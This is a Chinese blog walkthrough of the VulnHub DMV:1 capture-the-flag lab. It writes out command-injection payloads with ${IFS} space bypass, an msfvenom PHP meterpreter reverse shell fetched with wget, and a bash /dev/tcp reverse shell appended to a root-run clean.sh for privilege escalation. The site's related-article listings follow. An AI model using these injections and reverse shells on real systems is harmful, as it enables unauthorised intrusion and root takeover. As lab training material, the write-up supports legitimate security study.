VulnHub DMV:1

最新推荐文章于 2024-05-14 20:07:43 发布
最新推荐文章于 2024-05-14 20:07:43 发布
阅读量253 收藏
点赞数
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JC_xxx/article/details/108877636
版权

DMV:1靶机下载地址:https://www.vulnhub.com/entry/dmv-1,462/
环境:靶机在VirtualBox中,用的是 VirtualBox Host-Only网卡,ip:192.168.56.111
在这里插入图片描述
攻击机 kali在VMware中,使用桥接模式,桥接至VirtualBox Host-Only网卡,ip:192.168.56.112
在这里插入图片描述
nmap 扫描发现靶机
在这里插入图片描述
nmap 扫描主机端口及其对应的服务,这里开放了22(ssh)和80(http)
在这里插入图片描述
访问http://192.168.56.111/ 发现这里存在输入框尝试使用burp抓包分析
在这里插入图片描述
存在可控变量yt_url
在这里插入图片描述
经过测试发现有命令执行,whoami命令被成功执行
在这里插入图片描述
但是这里空格被过滤了
在这里插入图片描述
空格绕过的方法很多,这里利用${IFS}替代空格进行绕过
在这里插入图片描述
既然存在命令执行,可以想到是否可以利用wget直接将木马下载至靶机
测试发现wget可以使用
在这里插入图片描述
使用msfenom构造Meterpreter后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.112 LPORT=777 -f raw > shell.php

在这里插入图片描述
在msf中配置相关选项

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.112
set port 777
run -j

在这里插入图片描述
利用python3在本地开启http服务

python3 -m http.server 8888

在这里插入图片描述
利用wget下载meterpreter后门

;wget${IFS}http://192.168.56.112:8888/shell.php;

在这里插入图片描述
下载成功
在这里插入图片描述
触发后门

;curl${IFS} http://192.168.56.111/shell.php;

在这里插入图片描述
msf这边也成功创建session
在这里插入图片描述
利用python获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
进入admin目录找到flag.txt
在这里插入图片描述
whoami查看用户为www-data
在这里插入图片描述
进入tmp目录 运行./clean.sh 权限不足
在这里插入图片描述
在本地开启nc

nc -lvvp 2333

在之前或获取的靶机shell中运行以下命令

echo bash -c 'bash -i >& /dev/tcp/192.168.56.112/2333 0>&1' >> clean.sh

接着./clean.sh运行,会发现依旧权限不足
在这里插入图片描述
回到本地已经成功反弹shell,查看权限为root,继续利用python获得交互式shell
在这里插入图片描述
查看最后的flag在/root/root.txt
在这里插入图片描述

JC_xxx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dmv-checker:DMV CA检查器脚本
05-01
DMV约会检查器 如何使用 a@b:~/tools/dmv$ ./check.sh | grep -B2 July 903 West C Street ALTURAS, CA Monday, July 9, 2018 at 2:30 PM -- 430 South Broadway BLYTHE, CA Monday, July 16, 2018 at 10:20 AM ...
ca-license-plates:加州DMV的虚荣车牌申请
04-23
applications.csv是加利福尼亚DMV从2015-2016年收到的23,463个个性化车牌应用程序的CSV文件。 这些并不代表DMV在该时间段内收到的所有申请,仅代表标记为由审核委员会进行进一步审核的申请。 该文件包括以下列: ...
VulnHub DMV:1 Writeup
末初的CSDN博客
09-29 580
DMV:1详情见:https://www.vulnhub.com/entry/dmv-1,462/ 靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.104 攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 扫描C段内存活主机 arp-scan -l or nmap -sP 192.168.56.1/24 Nmap扫描目标IP,收集信息 nmap -A -Pn -
vulnhub靶机DMV
Keepb1ue的博客
10-09 3543
靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/dmv-1,462/ 靶机DMV (VirtualBox) IP:192.168.56.112 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址有详细的靶机说明,而DMV需要寻找的flag总数为2个。 靶机环境配置: 将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBoxHost-only网卡,保证无干扰目标。 确定目标ip: 确定目标ip,这里我使用net
Vulnhub系列】Acid
大方子
11-28 1513
下载连接:https://download.vulnhub.com/acid/Acid.rar 靶机说明 Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors. 欢迎来到酸的世界。童话故事需要使用秘密钥匙打开魔法门。 目标 获得root权限和flag。 运行环境 ...
vulhub-DMV:1
2201_75378806的博客
05-14 196
echo "chmod u+s /usr/bin/find" >> clean.sh 过一段时间执行。在检查 Github 链接时,我们发现了有关此 Web 应用程序可以接受哪些命令句柄的选项。或者直接上传一个.sh文件后,利用命令执行直接执行文件,反弹shell也可以。测试框粘贴随机的 YouTube URL 后,我们点击转换按钮。,无奈使用php弹了一个shell到攻击机上,发现可以运行成功。直接写入反弹shell,kali监听,等待一会就提权了。可以用用其他方式绕过,比如。单击拦截并将其打开。
论文 3DMV: Joint 3D-Multi-View Prediction for 3D Semantic Scene Segmentation
sinat_26871259的博客
10-30 943
Dataset: ScanNet 获取方式: 签署协议书(http://dovahkiin.stanford.edu/scannet-public/ScanNet_TOS.pdf)后发送至邮箱:scannet@googlegroups.com Data Organization <scanId> |-- <scanId>.sens RGB-D sensor...
数据库系统异常排查之DMV
qq_38472451的博客
07-28 79
数据库系统异常排查之DMV
SQL Server: DMV to Track Page Split
HyperWang的专栏
08-26 535
原文链接:http://social.technet.microsoft.com/wiki/contents/articles/25473.sql-server-dmv-to-track-page-split.aspxIntroductionPage split is important factor in analyzing how often a fragmentation occurs in
[ECCV'18]3DMV:联合3D多视图预测3D语义场景分割_Python_下载.zip
04-30
1. 数据集:项目可能包含预处理好的训练和测试数据集,这些数据集通常由多视图图像和对应的3D点云标签组成。 2. 模型定义:3DMV的网络架构详细描述,可能在`.py`文件,包括输入层、卷积层、池化层以及损失函数等。...
3DMV: 用于3D语义场景分割的联合2D-3D架构
3DMV:用于3D语义场景分割的Angela Dai1和Matthias Nießner21斯坦福大学2慕尼黑工业大学Fig. 1. 3DMV将RGB-D扫描的重建连同其彩色图像(左)作为输入,并以每体素标签的形式预测3D语义分割(映射到网格,右)。我们...
DMV34_spring9fy_DMV34_
10-04
DMV34_spring9fy_DMV34_——深度解析DeathMach与CSS v34的结合应用》 在IT行业,DeathMach是一款备受瞩目的游戏引擎,而CSS(Cascading Style Sheets)作为网页样式设计的重要工具,其版本迭代也一直吸引着...
2进制3位数过去现在将来输赢公式代码.txt
09-07
2进制3位数过去现在将来输赢公式代码
福州大学在广东2021-2024各专业最低录取分数及位次表.pdf
最新发布
09-07
全国各大学在广东2021-2024各专业最低录取分数及位次表
WordPress 集网址、资源、资讯于一体的导航类主题开心版
09-07
WordPress 集网址、资源、资讯于一体的导航类主题开心版; 运行环境 PHP7.4 + MYSQL5.6
【Java学习】activemq消息间件学习demo.zip
09-07
【Java学习】activemq消息间件学习demo.zip 【Java学习】activemq消息间件学习demo.zip 【Java学习】activemq消息间件学习demo.zip
爬取淘宝热销(热门)手机支架商品信息公开透明的数据集
09-07
本资源专注于收集淘宝热销(热门)手机支架商品信息,内容涵盖商品的店铺所在省份、城市位置、商品的名称、销售价格、累积销量、单价(以人民币计价)、付款的顾客人数、是否提供包邮服务、是否为天猫平台的商品,以及相关的满减优惠情况。这些详细的数据点均来源于淘宝平台的公开透明信息,经过精确抓取和整理,旨在为分析电商平台上的新品推荐策略和消费者购买行为提供实用数据。 这些数据严格遵循淘宝平台的公开政策和隐私保护原则获取,确保了信息的合法性与合规性。然而,本资源仅作为学习参考之用,意在帮助研究人员、市场分析师或学生等理解电商领域的商品推荐机制、销售动态及市场趋势。 任何将此数据用于商业目的或其他未授权的活动都是不恰当的,甚至可能触犯相关法律条款。 在使用这些数据进行学术研究或个人学习时,用户应自觉遵守相关法律法规,尊重数据来源和版权,正确引用数据源,并不得用于任何形式的商业盈利。 注意:这是一份数据集
【目标检测数据集】斧子数据集2396张VOC+YOLO格式(含增强60%).zip
09-07
数据集格式:Pascal VOC格式+YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数):2396 标注数量(xml文件个数):2396 标注数量(txt文件个数):2396 标注类别数:1 标注类别名称:["futou"] 每个类别标注的框数: futou 框数 = 2484 总框数:2484 使用标注工具:labelImg
3DMV:融合2D-3D的3D语义场景分割新方法
"3DMV: 用于3D语义场景分割的联合2D-3D架构" 3DMV是一种创新的3D语义场景分割方法,由Angela Dai和Matthias Nießner提出,它结合了2D和3D数据的优势,尤其适用于室内环境的RGB-D扫描重建。该方法通过构建一个联合...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值